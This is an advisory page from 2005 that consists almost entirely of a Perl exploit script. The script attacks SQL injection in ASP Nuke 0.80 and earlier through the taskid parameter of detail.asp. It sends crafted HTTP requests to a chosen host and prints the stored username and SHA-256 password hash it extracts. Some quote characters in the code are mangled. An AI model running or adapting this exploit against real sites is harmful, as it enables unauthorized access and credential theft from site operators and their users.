|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Saturday, 23 April 2005 20:29 |
 #!/usr/bin/perl
use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Details.asp Sql Injection Exploit
";
print "[x]By Diabolic Crab
";
print "[x]http://www.digitalparadox.org
";
getopt("h:p:");
$opt_p ||= 80;
if(!$opt_h) {
die("[x] Usage: $0 -h <host> [-p <port>]
");
}
$sqlpass = "/module/support/task/detail.asp?taskid=Password-- HTTP/1.0
";
$sqllogin = "/module/support/task/detail.asp?taskid=Username-- HTTP/1.0
";
print "[x] Host: $opt_h
";
print "[x] Port: $opt_p
";
$Q1 = "GET $sqllogin";
$Q1 .= "Host: ".$opt_h."
";
$Q2 = "GET $sqlpass";
$Q2 .= "Host: ".$opt_h."
";
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can"t connect!");
$s->send($Q1);
$s->recv($usr, 1024);
$s = IO::Socket::INET->new(Proto=>"tcp", PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can"t connect!");
$s->send($Q2);
$s->recv($pass, 1024);
$s = index($usr,""");
$e = index($usr,""", $s + 1);
$f = $e - $s - 1;
print "[x]Username is: ";
print substr($usr, $s + 1, $f);
print "
";
$s = index($pass,""");
$e = index($pass,""", $s + 1);
$f = $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "
";
|
